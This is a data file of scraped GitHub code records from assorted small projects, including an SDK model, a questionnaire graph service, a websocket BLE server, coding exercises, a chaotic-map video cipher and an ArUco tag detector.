`version`, must be None or one of {allowed_values}\"\n )\n self._version = version\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == 
other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/data_labeling_service/models/export_format.py","file_name":"export_format.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"9809694231","text":"import networkx\n\nfrom signals.apps.questionnaires.app_settings import MAX_QUESTIONS\nfrom signals.apps.questionnaires.models import Edge, Question\n\n\nclass QuestionGraphService:\n def __init__(self, q_graph):\n self._q_graph = q_graph\n\n def refresh_from_db(self):\n \"\"\"\n Retrieve all QuestionGraph data, cache it.\n \"\"\"\n # Retrieve all relevant edges, questions and answers\n self._edges = self._get_edges(self._q_graph)\n self._nx_graph = self._build_nx_graph(self._q_graph, self._edges)\n self._questions = self._get_all_questions(self._nx_graph)\n\n # setup caches for quick access\n self._edges_by_id = {e.id: e for e in self._edges}\n self._questions_by_id = {q.id: q for q in self._questions}\n\n self._reachable_questions_by_id = self._get_reachable_questions(self._nx_graph, self._q_graph)\n self._endpoint_questions_by_id = self._get_endpoint_questions(\n self._nx_graph, self._questions_by_id, self._reachable_questions_by_id)\n\n def _get_edges(self, q_graph):\n \"\"\"\n List of Edge instances decsribing QuestionGraph structure.\n \"\"\"\n return list(Edge.objects.filter(graph=q_graph)\n .select_related('choice')\n .select_related('question')\n .select_related('next_question'))\n\n @staticmethod\n def _build_nx_graph(q_graph, edges):\n \"\"\"\n Get NetworkX graph representing the QuestionGraph.\n \"\"\"\n # To allow for matching rule and default rule (i.e. a double edge).\n nx_graph = networkx.MultiDiGraph()\n\n for edge in edges:\n # Needed for rule matching and determining next questions (edge\n # ordering is important if several rules match and we want\n # consistent results):\n edge_kwargs = {\n 'choice_payload': None if edge.choice is None else edge.choice.payload,\n 'choice_payload_display': '' if edge.choice is None else edge.choice.display,\n 'edge_id': edge.id,\n 'order': edge.order,\n }\n\n # Needed for question graph visualization:\n if edge.choice:\n edge_kwargs['choice_label'] = (f'{edge.choice.display or edge.choice.payload}'\n f' {\" (selected)\" if edge.choice.selected else \"\"}')\n\n # Add the edge with all relevant information:\n nx_graph.add_edge(edge.question_id, edge.next_question_id, **edge_kwargs)\n\n # Add node metadata\n nx_graph.add_node(edge.question.id, label=edge.question.label, ref=edge.question.ref,\n multiple_answers_allowed=edge.question.multiple_answers_allowed)\n nx_graph.add_node(edge.next_question.id, label=edge.next_question.label, ref=edge.next_question.ref)\n\n if len(nx_graph) > MAX_QUESTIONS:\n msg = f'Question graph {q_graph.name} contains too many questions.'\n raise Exception(msg)\n\n if q_graph.first_question and q_graph.first_question not in nx_graph.nodes:\n nx_graph.add_node(q_graph.first_question.id, label=q_graph.first_question.label,\n ref=q_graph.first_question.ref,\n multiple_answers_allowed=q_graph.first_question.multiple_answers_allowed)\n\n return nx_graph\n\n @staticmethod\n def _get_reachable_questions(nx_graph, q_graph):\n \"\"\"\n Grab questions linked to QuestionGraph reachable from first_question.\n \"\"\"\n reachable = networkx.descendants(nx_graph, q_graph.first_question.id)\n reachable.add(q_graph.first_question.id)\n\n return {q.id: q for q in Question.objects.filter(id__in=reachable)}\n\n 
@staticmethod\n def _get_endpoint_questions(nx_graph, questions_by_id, reachable_questions_by_id):\n \"\"\"\n Get endpoint questions in QuestionGraph.\n \"\"\"\n endpoint_questions_by_id = {}\n for question_id, out_degree in nx_graph.out_degree():\n if out_degree == 0 and question_id in reachable_questions_by_id:\n endpoint_questions_by_id[question_id] = questions_by_id[question_id]\n\n return endpoint_questions_by_id\n\n @staticmethod\n def _get_all_questions(nx_graph):\n \"\"\"\n Grab questions linked to QuestionGraph.\n \"\"\"\n return list(Question.objects.filter(id__in=nx_graph.nodes()))\n\n @property\n def endpoint_questions(self):\n \"\"\"\n List of questions that form the endpoints of a QuestionGraph.\n \"\"\"\n if not hasattr(self, '_endpoint_questions_by_id'):\n self.refresh_from_db()\n return self._endpoint_questions_by_id\n\n @property\n def nx_graph(self):\n \"\"\"\n networkx.MultiDigraph instance representing QuestionGraph.\n \"\"\"\n if not hasattr(self, '_nx_graph'):\n self.refresh_from_db()\n return self._nx_graph\n\n @property\n def questions(self):\n \"\"\"\n List of Question instance (reachable and not) for QuestionGraph.\n \"\"\"\n if not hasattr(self, '_questions'):\n self.refresh_from_db()\n return self._questions\n\n @property\n def reachable_questions(self):\n \"\"\"\n List of Question instances for QuestionGraph (only reachable ones).\n \"\"\"\n if not hasattr(self, '_reachable_questions_by_id'):\n self.refresh_from_db()\n return list(self._reachable_questions_by_id.values())\n\n def validate(self):\n \"\"\"\n Check QuestionGraph for validity.\n \"\"\"\n # TODO, check QuestionGraph for the following:\n # - maximum number of questions\n # - no unreachable questions\n # - decision points (questions) in the graph must enforce questions\n pass\n","repo_name":"Amsterdam/signals","sub_path":"app/signals/apps/questionnaires/services/question_graph.py","file_name":"question_graph.py","file_ext":"py","file_size_in_byte":5909,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"52"} +{"seq_id":"74725514085","text":"import sys\n\ntry:\n\tmap_input = sys.argv[1]\n\tinput = sys.argv[2]\n\toutput = sys.argv[3]\nexcept:\n\tprint(\"param: $(map input file) $(input file) $(output file)\")\n\tsys.exit()\n\nm = {}\n\nwith open(map_input, 'r') as f:\n\tfor l in f:\n\t\tl = l.strip().split('\\t')\n\t\tm[l[0].lower()] = l[1]\n\nwith open(input, 'r') as fi:\n\twith open(output, 'w') as fo:\n\t\tfo.write(\"id,sequence\\n\")\n\t\tfor i,l in enumerate(fi):\n\t\t\tfo.write('%d,' % i)\n\t\t\ttmp = []\n\t\t\tfor e in l:\n\t\t\t\ttry:\n\t\t\t\t\te = e.lower()\n\t\t\t\t\ttmp.append(m[e])\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\tfo.write(''.join(tmp)+'\\n')\n","repo_name":"chialunwu/MLDS-final","sub_path":"script/sentence_to_ch_2.py","file_name":"sentence_to_ch_2.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22642064762","text":"# Databricks notebook source\n# DBTITLE 1,Import Libraries\n# MAGIC %md\n# MAGIC Reference : https://blog.devgenius.io/daily-coding-problem-problem-11-3452b3a63ddb\n# MAGIC\n# MAGIC\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Implement a job scheduler which takes in a function f and an integer n, and calls f after n milliseconds.\n\n# COMMAND ----------\n\n# DBTITLE 1,*args (Non-Keyword Arguments)\ndef add(*args):\n list1 = sum(list(map(lambda v : v**2 , args )))\n return list1\n\n#l2 = list(map(lambda v: v ** 2, 
l1))\nadd(2,3,5)\n \n\n# COMMAND ----------\n\n# DBTITLE 1,*kwargs (Keyword Arguments)\ndef kwar(**kwargs):\n    \n    for key, value in kwargs.items():\n        print(\"%s == %s\" % (key, value))\n    \ndict = {\"test\":1, \"test2\":2 , \"test3\": 3}\nkwar(**dict)\n\n# COMMAND ----------\n\n# DBTITLE 1,Simple\nimport time\ndef func(**args):\n    for i in args:\n        print(i)\n        time.sleep(10)\n    \nl1 = {\"job1\":2,\"job2\" : 5,\"Job3\": 6, \"Job4\" : 9}\nfunc(**l1)\n\n# COMMAND ----------\n\nimport heapq\nimport threading\nfrom time import sleep, time\nclass Scheduler:\n    def __init__(self):\n        self.functions = []\n        thread = threading.Thread(target=self._poll)\n        thread.start()\n    def _poll(self):\n        while True:\n            now = time() * 1000\n            if len(self.functions) > 0:\n                due, func, args, kwargs = self.functions[0]\n                if now > due:\n                    func(*args, **kwargs)\n            self.functions = [(due, func, args, kwargs) for due, func, args, kwargs in self.functions if due > now]\n            sleep(0.01)\n    def schedule(self, func, n, *args, **kwargs):\n        heapq.heappush(self.functions, (n + time() * 1000, func, args, kwargs))","repo_name":"srinujammu/Daily-Coding","sub_path":"Daily coding - 11.py","file_name":"Daily coding - 11.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6671483649","text":"import asyncio\nimport websockets\nimport json\nimport os\n\nfrom ble_project import BLEProject\nfrom serial_data import SerialData\n\nCHUNK_SIZE = 1000\nPORT = 64569\n\n\nclass ClientCommand:\n\n    @classmethod\n    def from_json(cls, str):\n        obj = json.loads(str)\n        hub = obj[\"hub\"]\n        funcname = obj[\"func\"]\n        args = obj[\"args\"]\n        return_id = obj[\"return_id\"]\n        return cls(hub, funcname, args, return_id)\n    \n    def __init__(self, hub, funcname, args, return_key=None):\n        self.hub = hub\n        self.funcname = funcname\n        self.args = args\n        self.return_key = return_key\n    \n    async def commit(self, project):\n        if self.hub is None:\n            func = getattr(project, self.funcname)\n        else:\n            func = getattr(project.hubs[self.hub], self.funcname)\n\n        if asyncio.iscoroutinefunction(func):\n            # print(f\"awaiting coroutine: {func} with args {self.args}\")\n            result = await func(*self.args)\n        else:\n            # print(f\"executing func: {func}\")\n            result = func(*self.args)\n        \n        if self.return_key is not None:\n            send_data = SerialData(self.return_key, self.hub, result)\n            await project.out_queue.put(send_data)\n\n\nclass BLEServer:\n\n    def __init__(self):\n        self.project = BLEProject\n        self.server = None\n        self.connected = False\n\n    \n    async def out_handler(self, websocket, path):\n        while True:\n            print(\"[BLEServer] waiting for messages to send...\")\n            serial_data = await project.out_queue.get()\n            message = serial_data.to_json()\n            print(f\"[BLEServer] sending message: {message}\")\n            await websocket.send(message)\n    \n    async def in_handler(self, websocket, path):\n        print(\"[BLEServer] waiting for messages to receive...\")\n        async for message in websocket:\n            print(f\"[BLEServer] got message: {message}\")\n            command = ClientCommand.from_json(message)\n            await command.commit(project)\n\n    async def server_loop(self, websocket, path):\n        self.connected = True\n        print(\"listening for commands now\")\n        \n        in_task = asyncio.ensure_future(self.in_handler(websocket, path))\n        out_task = asyncio.ensure_future(self.out_handler(websocket, path))\n        done, pending = await asyncio.wait([in_task, out_task], return_when=asyncio.FIRST_COMPLETED)\n        print(\"in or out handler are done!\")\n        for task in pending:\n            task.cancel()\n        # except 
websockets.exceptions.ConnectionClosed:\n        #    break\n        self.connected = False\n\n    async def serve(self):\n        print(\"serving now\")\n        async def wait_for_connected():\n            while not self.connected:\n                await asyncio.sleep(1)\n        async def wait_for_disconnected():\n            while self.connected:\n                await asyncio.sleep(1)\n        async with websockets.serve(self.server_loop, \"localhost\", PORT) as server:\n            await wait_for_connected()\n            await wait_for_disconnected()\n\nproject = None\n\nasync def main():\n    global project\n    print(f\"cwd: {os.getcwd()}\")\n    print(f\"script: {__file__}\")\n    project = BLEProject()\n    server = BLEServer()\n    await server.serve()\n\nif __name__ == \"__main__\":\n    \n    asyncio.run(main())\n","repo_name":"Novakasa/brickrail","sub_path":"ble-server/ble_server.py","file_name":"ble_server.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"52"} +{"seq_id":"15454323066","text":"with open('./boxid.txt') as f:\r\n\tlines = f.read().splitlines()\r\ntwiced = 0\r\nthriced = 0\r\nletters = list()\r\nfor str in lines:\r\n    letters.clear()\r\n    count2 = 0\r\n    count3 = 0\r\n    for x in str:\r\n        if x not in letters:\r\n            letters.append(x)\r\n            val = str.count(x)\r\n            if val == 2:\r\n                count2 += 1\r\n            if val == 3:\r\n                count3 += 1\r\n    if count2 > 0:\r\n        twiced += 1\r\n    if count3 > 0:\r\n        thriced += 1\r\nprint(twiced * thriced)\r\n \r\n","repo_name":"Acellama88/AdventOfCode","sub_path":"AoC02/AoC02p1.py","file_name":"AoC02p1.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20287497000","text":"from weather import Weather, Unit\nimport Driver\n\nclass WeatherMap(Driver.Driver):\n    device_name = \"weathermap\"\n    def get(self, req):\n        weather = Weather(unit=Unit.FAHRENHEIT)\n\n        lookup = weather.lookup(2464467)\n        condition = lookup.condition\n        if req==\"temp\":\n            return condition.temp\n        elif req == \"skies\":\n            return condition.text\n        elif req == \"all\":\n            return str(condition.temp) + u'\\u00B0' + \", \" + condition.text\nw = WeatherMap()\nprint(w.get(\"all\"))\n    \n","repo_name":"naclcaleb/Charles","sub_path":"WeatherMap.py","file_name":"WeatherMap.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"13494953881","text":"import pandas as pd\r\n\r\n#df_csv = pd.read_csv('pokemon_data.csv')\r\n\r\npd.options.display.max_rows = 9999\r\npd.options.display.max_columns = 9999\r\n\r\n# Reads .CSV file and stores data in dataframe\r\ndf = pd.read_csv('pokemon_data.csv')\r\n\r\n# Creating new columns / data for the dataframe\r\n#df_csv['Total'] = df_csv['HP'] + df_csv['Attack'] + df_csv['Defense'] + df_csv['Sp. Atk'] + df_csv['Sp. Def']\r\n\r\n#df_amended = df_csv.drop(columns = ['Speed'])\r\n\r\n#for index, row in df_csv.iterrows():\r\n#    print(index, row)\r\n#    print('\\n')\r\n\r\n#df_amended.to_csv('modified_data.csv')\r\n#df_amended.to_excel('modified_data.xlsx')\r\n#df_amended.to_csv('modified_data.txt', sep = '\\t')\r\n\r\n#Task 1 \r\n#This creates all the different types of pokemon\r\ntotal_types = df['Type 1'].value_counts()\r\n\r\n#Task 2 \r\n#Sorts out each attack, by the different generation of what the pokemon is\r\nattack_by_generation = df['Attack'].groupby(df['Generation']).mean()\r\n\r\n#Task 3 \r\n#This gives you the average stats for each trait; so attack, defence etc\r\naverage_stats = df[['Attack', 'Defense', 'Sp. Atk', 'Sp. 
Def', 'HP']].groupby(df['Generation']).mean()\r\n\r\n#Task 4 \r\n#Gives you the top 10 values for the 'attack' trait\r\ntop_10 = df.sort_values(['Attack'], ascending = False).head(10)\r\n\r\n#Task 5 \r\n#Gives you the bottom 10 values for the 'attack' trait\r\nbottom_10 = df.sort_values(['Attack'], ascending = False).tail(10)\r\n\r\n#SAVING NEW DATABASE\r\ntotal_types.to_csv('total_types_database.csv')\r\nattack_by_generation.to_csv('attack_by_generation_database.csv')\r\naverage_stats.to_csv('average_stats_database.csv')\r\ntop_10.to_csv('top_10_database.csv')\r\nbottom_10.to_csv('bottom_10_database.csv') ","repo_name":"JamesBradleyBigCreative/Classroom_Exercises","sub_path":"Evan Manister/pokemon pandas/pokemon pandas/pokemon_pandas.py","file_name":"pokemon_pandas.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"74081718565","text":"# This is a sample Python script.\n\nimport threading\nimport math\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\nimport random\nimport time\n\nimport cv2\nimport numpy\nimport numpy as np\nfrom PIL import Image\nfrom PIL.Image import Image\nfrom matplotlib import pyplot as plt\nfrom skimage import img_as_float\n\n\n# Rewrite the key generation into an array\n# Figure out why the encryption output is bad (most likely a key problem), see generate_key and generate_n\n\ndef chebushev(xn, l1, n):\n    x = np.zeros(n)\n    x[0] = xn\n    for i in range(n - 1):\n        x[i + 1] = math.cos(l1 * (1 / math.cos(x[i])))\n    return x[::-1]\n\n\ndef logistic(x0, l2, n):\n    x = np.zeros(n)\n    x[0] = x0\n    for i in range(n - 1):\n        x[i + 1] = l2 * x[i] * (1 - x[i])\n    return x\n\n\ndef cubic(x0, l3, n):\n    x = np.zeros(n)\n    x[0] = x0\n    for i in range(n - 1):\n        x[i + 1] = l3 * x[i] * (1 - x[i] ** 2)\n    return x\n\n\ndef sine(x0, l4, n):\n    x = np.zeros(n)\n    x[0] = x0\n    for i in range(n - 1):\n        x[i + 1] = l4 * math.sin(math.pi * x[i])\n    return x\n\n\ndef tent(x0, mu, n):\n    x = np.zeros(n)\n    x[0] = x0\n    for i in range(n - 1):\n        if (x[i] <= mu):\n            x[i + 1] = x[i] / mu\n        else:\n            x[i + 1] = (1 - x[i]) / (1 - mu)\n    return x\n\n\ndef henon(x0, x1, a, l5, n):\n    x = np.zeros(n)\n    x[0] = x0\n    x[1] = x1\n    for i in range(3, n):\n        x[i] = 1 + l5 * (x[i - 2] - x[i - 3]) - a * (x[i - 2] ** 2)\n    return x\n\n\ndef generate_i_c(key):\n    n = 0.0\n    for i in key:\n        n += int(i, 2) / 256\n\n    return n - math.floor(n)\n\n\ndef generate_key():\n    key = []\n    for i in range(0, 32):\n        key.append(str.ljust(bin(random.randint(1, 255)).replace(\"0b\", ''), 8, '0'))\n    return key\n\n\ndef generate_secret_key(bk, lk, ck, sk, tk, hk):\n    res = np.zeros((len(bk)))\n    for i in range(len(bk)):\n        res[i] = int(bk[i], 2) ^ int(lk[i], 2) ^ int(ck[i], 2) ^ int(sk[i], 2) ^ int(tk[i], 2) ^ int(hk[i], 2)\n    return res\n\n\ndef generate_n(img):\n    vector = img.reshape((img.shape[0] * img.shape[1],))\n\n    b_vector = []\n    n = 0\n\n    for i in range(np.size(vector)):\n        b_vector.append(str.zfill(bin(vector[i]).replace(\"0b\", ''), 8))\n        if i % 32 == 0:\n            n += 1\n    return n, b_vector\n\n\ndef encrypt(img_list, key, orig):\n    res = []\n\n    img_list_int = np.zeros(len(img_list))\n    for i in range(len(img_list)):\n        img_list_int[i] = int(img_list[i], 2)\n    for i in range(int(len(img_list) / len(key))):\n        img_cut = img_list_int[i * len(key):i * len(key) + len(key)]\n        res.append(np.int_(img_cut) ^ np.int_(key))\n    nail = img_list_int[int(len(img_list) / len(key)) 
* len(key): len(img_list)]\n    res.append(np.int_(nail) ^ np.int_(key[:len(nail):]))\n    return np.array([x for l in res for x in l]).reshape((orig.shape[0], orig.shape[1]))\n\n\ndef decrypt(encrimg, key):\n    res = []\n    encr_vector = encrimg.reshape((encrimg.shape[0] * encrimg.shape[1],))\n    for i in range(int(len(encr_vector) / len(key))):\n        img_cut = encr_vector[i * len(key):i * len(key) + len(key)]\n        res.append(np.int_(img_cut) ^ np.int_(key))\n    nail = encr_vector[int(len(encr_vector) / len(key)) * len(key): len(encr_vector)]\n    res.append(np.int_(nail) ^ np.int_(key[:len(nail):]))\n    return (np.array([x for l in res for x in l])).reshape((encrimg.shape[0], encrimg.shape[1]))\n\n\ndef float_to_bin_fixed(f):\n    if not math.isfinite(f):\n        return repr(f)  # inf nan\n\n    sign = '-' * (math.copysign(1.0, f) < 0)\n    frac, fint = math.modf(math.fabs(f))  # split on fractional, integer parts\n    n, d = frac.as_integer_ratio()  # frac = numerator / denominator\n    assert d & (d - 1) == 0  # power of two\n    return f'{sign}{math.floor(fint):b}.{n:0{d.bit_length() - 1}b}'\n\n\ndef convert(arr):\n    chaos = []\n    for i in arr:\n        chaos.append(float_to_bin_fixed(i).replace('-', '')[2:10:])\n    return chaos\n\n\ndef calculate_math(enctypted):\n    # m_x = np.mean(enctypted, axis=1)\n    # m_y = np.mean(enctypted, axis=0)\n    # print('m_x', m_x)\n    # print('m_y', m_y)\n    var = 0\n    m = np.mean(enctypted)\n    print('m', m)\n    for i in range(enctypted.shape[0]):\n        for j in range(enctypted.shape[1]):\n            var += (enctypted[i][j] - m) ** 2\n    var = var / (enctypted.shape[0] * enctypted.shape[1])\n    print('var', var)\n    # var_x = 1 / (enctypted.shape[0] * enctypted.shape[1]) * np.sum(a)\n    # var_y = np.var(enctypted, axis=0)\n    # print('var_x', var_x)\n    # print('var_y', var_y)\n\n\n    # con_xy = 1 / (enctypted.shape[0] * enctypted.shape[1]) * np.sum()\n\n\ndef plot_img_and_hist(image, axes, bins=256):\n    # Convert the image to double-precision floating-point format\n    image = img_as_float(image)\n    ax_img, ax_hist = axes\n    ax_img.imshow(image, cmap=plt.cm.gray)\n\n    # Display histogram\n    ax_hist.hist(image.flatten(), bins=bins, histtype='step', color='black')\n    ax_hist.set_xlabel('Pixel intensity', fontsize=25)\n    ax_hist.tick_params(axis=\"x\", labelsize=20)\n    ax_hist.tick_params(axis=\"y\", labelsize=20)\n\n    return ax_img, ax_hist\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n    # block size = 256\n    start = time.time()\n    key = generate_key()\n    ic = generate_i_c(key)\n    l1 = 4\n    l2 = 4\n    l3 = 2.59\n    l4 = 0.99\n    l5 = 0.3\n    a = random.uniform(1.07, 1.09)\n    mu = 0.4\n\n    vid_capture = cv2.VideoCapture('video.mkv')\n    frame_width = int(vid_capture.get(3))\n    frame_height = int(vid_capture.get(4))\n    frame_size = (frame_width, frame_height)\n    output = cv2.VideoWriter('output_video.avi',\n                             cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 20, frame_size)\n\n    file = open(\"keys.txt\", \"w\")\n\n\n\n    while (vid_capture.isOpened()):\n        # The vid_capture.read() method returns a tuple whose first element is a boolean\n        # and whose second element is the frame\n        ret, frame = vid_capture.read()\n        if ret:\n            img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n            n, img_b = generate_n(img)\n\n            bk = chebushev(ic, l1, n)\n            lk = logistic(ic, l2, n)\n            ck = cubic(ic, l3, n)\n            sk = sine(ic, l4, n)\n            tk = tent(ic, mu, n)\n            hk = henon(ic, ic, a, l5, n)\n\n            secret_key = generate_secret_key(convert(bk), convert(lk), convert(ck), convert(sk), convert(tk),\n                                             convert(hk))\n            file.write(str(secret_key))\n            encrypted = encrypt(img_b, secret_key, img)\n            
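            # Hypothetical sanity check (not part of the original flow): XOR with
            # the same key stream is its own inverse, which is why decrypt() below
            # can undo encrypt() using the key derived from the chaotic maps:
            #
            #     block = np.array([12, 200, 7], dtype=np.int_)
            #     k = np.array([90, 33, 250], dtype=np.int_)
            #     assert np.array_equal((block ^ k) ^ k, block)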
decrypted = decrypt(encrypted, secret_key)\n            output.write(encrypted)\n        else:\n            print('Stream disconnected')\n            break\n    vid_capture.release()\n    output.release()\n    file.close()\n\n\n    # vid_capture = cv2.VideoCapture('output_video.avi')\n    # frame_width = int(vid_capture.get(3))\n    # frame_height = int(vid_capture.get(4))\n    # frame_size = (frame_width, frame_height)\n    # output = cv2.VideoWriter('output_decrypted_video.avi',\n    #                          cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 20, frame_size)\n    # while (vid_capture.isOpened()):\n    #     # The vid_capture.read() method returns a tuple whose first element is a boolean\n    #     # and whose second element is the frame\n    #     ret, frame = vid_capture.read()\n    #     if ret:\n    #\n    #         n, img_b = generate_n(frame)\n    #         decrypted = decrypt(frame, secret_key)\n    #         output.write(decrypted)\n    #     else:\n    #         print('Stream disconnected')\n    #         break\n\n\n\n    # calculate_math(enctypted)\n    #\n    # end = time.time() - start\n    # print(end)\n    #\n    # fig = plt.figure(figsize=(15, 15))\n    # axes = np.zeros((2, 1), dtype=object)\n    # axes[0, 0] = fig.add_subplot(211)\n    # axes[1, 0] = fig.add_subplot(212)\n    #\n    # # ax_img, ax_hist = plot_img_and_hist(enctypted, axes[:, 0])\n    # ax_img, ax_hist = plot_img_and_hist(decrypted, axes[:, 0])\n    # ax_hist.set_ylabel('Number of pixels', fontsize=25)\n    # # prevent overlap of y-axis labels\n    # fig.tight_layout()\n    # plt.show()\n","repo_name":"ISSS163/Crypto","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22811459615","text":"'''\nPython Programming - advanced lists\n@author: Mohana Kamanooru - 15/10/2020\n\nCreate a program to throw 2 dice 100 times. Record how often each number from 2 to 12 is\nthrown in a suitable list and then print out a graph of your results like so:\nDistribution Chart\nScore Rolls\n2 1 *\n3 5 *****\n4 11 ***********\n5 13 *************\n6 15 ***************\n7 16 ****************\n8 18 ******************\n9 8 ********\n10 6 ******\n11 4 ****\n12 3 ***\n'''\nfrom random import randint\nglobal OCCURANCE\nglobal ROLL_COUNT\n\ndef get_dice_output():\n    current_output = randint(1, 6) + randint(1, 6)\n    return current_output\n\ndef get_occurances():\n    for ind in range(0,ROLL_COUNT):\n        current_output=get_dice_output()\n        if(current_output in range(2,13)):\n            OCCURANCE[current_output-2]+=1;\n    \n\ndef show_graph():\n    for x in range(0,len(OCCURANCE)): \n        print(str(x+2).ljust(2),\" \",str(OCCURANCE[x]).ljust(2),\" \",OCCURANCE[x]*'*')\n    #print(sum(OCCURANCE))\n    \n\nROLL_COUNT=100\nOCCURANCE=[0]*11\nget_occurances()\nshow_graph()\n\n \n \n\n \n\n# get the dice output\n# check if the output is in the list ","repo_name":"mohanakamanooru/Python","sub_path":"3 Functions and Lists/advanced_lists/dice_Distribution.py","file_name":"dice_Distribution.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71105496164","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 9 10:51:05 2022\n\n@author: Mahmoud Saeed\n\"\"\"\n\"\"\"\nproblem link :\n\n    \nhttps://www.codingninjas.com/codestudio/guided-paths/data-structures-algorithms/\ncontent/118509/offering/1376554\n\"\"\"\n\narr = [1 ,3, 1, 4 ,3, 1]\nn = len(arr)\n\ndef longestMountain(arr , n):\n    if n < 3:\n        return 0\n    i = 0\n    k = 0\n    while i < n:\n        j = i\n        if (j+1 < n) and (arr[j] < arr[j+1]):\n            while (j+1 < n) and (arr[j] < arr[j+1]):\n                j +=1\n            \n            if (j+1 < n) and (arr[j] > 
arr[j+1]):\n while (j+1 < n) and (arr[j] > arr[j+1]):\n j +=1\n \n k = max(k, j - i +1)\n \n i = max(j ,i+1) \n\n return k\n \n\n \nm = longestMountain(arr, n) \n\nprint(m) ","repo_name":"mahmoudsaeed99/CodeStudioProblems-coding-ninjas-","sub_path":"python/longestMountain.py","file_name":"longestMountain.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33063622408","text":"import cv2\nimport picamera\nimport time\nimport RPi.GPIO as GPIO\n\nenemy_pin = 16\nfriend_pin = 12\n\n#capture set number of frames on set camera\ndef run(frames=100,cam_num=0):\n\t#set up pins\n\tGPIO.setmode(GPIO.BCM)\n\tGPIO.setup(enemy_pin,GPIO.OUT)\n\tGPIO.setup(friend_pin,GPIO.OUT)\n\tGPIO.output(enemy_pin,0)\n\tGPIO.output(friend_pin,0)\n\t\n\t#set up aruco parameters\n\tarucoDict = cv2.aruco.Dictionary_get(cv2.aruco.DICT_6X6_250)\n\tarucoParams = cv2.aruco.DetectorParameters_create()\n\n\t#create camera object\n\tcam = cv2.VideoCapture(cam_num)\n\n\ttags = []\n\tfor i in range(frames):\n\t\t#capture frame, convert to gray, show frame\n\t\tret, image = cam.read()\n\t\timage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\t\tcv2.imshow('Imagetest',image)\n\t\t#wait for 50ms or keystroke\n\t\tk = cv2.waitKey(20)\n\t\t#if keystroke closes window then break loop\n\t\tif k != -1 :\n\t\t\tcam.release()\n\t\t\tcv2.destroyAllWindows()\t\n\t\t\tprint(tags)\n\t\t\tbreak\n\t\t#detect aruco tags in frame\t\t\n\t\t(corners,ids,rejected) = cv2.aruco.detectMarkers(image,arucoDict,\n\t\t\tparameters=arucoParams)\n\t\t#if a tag is detected then check if enemy or friend\n\t\tif ids is not None:\n\t\t\tvec = corners[0][0][0] - corners[0][0][1]\n\t\t\td = vec[0]**2 + vec[1]**2\n\t\t\tif d > 10000:\n\t\t\t\tif ids[0][0] >= 10 and ids[0][0] not in tags:\n\t\t\t\t\ttags.append(ids[0][0])\n\t\t\t\t\tprint('enemy')\n\t\t\t\t\tprint(ids[0][0])\n\t\t\t\t\t#enemy indicator led on\n\t\t\t\t\t#also sends pin signal to propeller to\n\t\t\t\t\t#execute knock off enemies routine on propeller\n\t\t\t\t\tGPIO.output(enemy_pin,1)\n\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\tGPIO.output(enemy_pin,0)\n\t\t\t\tif ids[0][0] < 10 and ids[0][0] not in tags:\n\t\t\t\t\ttags.append(ids[0][0])\n\t\t\t\t\tprint('friendly')\n\t\t\t\t\t#friend indicator led on\n\t\t\t\t\tGPIO.output(friend_pin,1)\n\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\tGPIO.output(friend_pin,0)\n\t\t\telse:\n\t\t\t\tprint('too far')\n\t\telse:\n\t\t\tprint('no tags')\n\t\t\tGPIO.output(friend_pin,0)\n\t\t\tGPIO.output(enemy_pin,0)\n\t\t\t\n\t#clean up all created objects\n\t#cv2.imwrite('/home/pi/testimage.jpg', image)\n\tcv2.destroyAllWindows()\n\tcam.release()\n\tcv2.destroyAllWindows()\t\n\tGPIO.output(friend_pin,0)\n\tGPIO.output(enemy_pin,0)\n\tGPIO.cleanup()\n\tprint(tags)\n\t\n#check indicator leds work properly\ndef 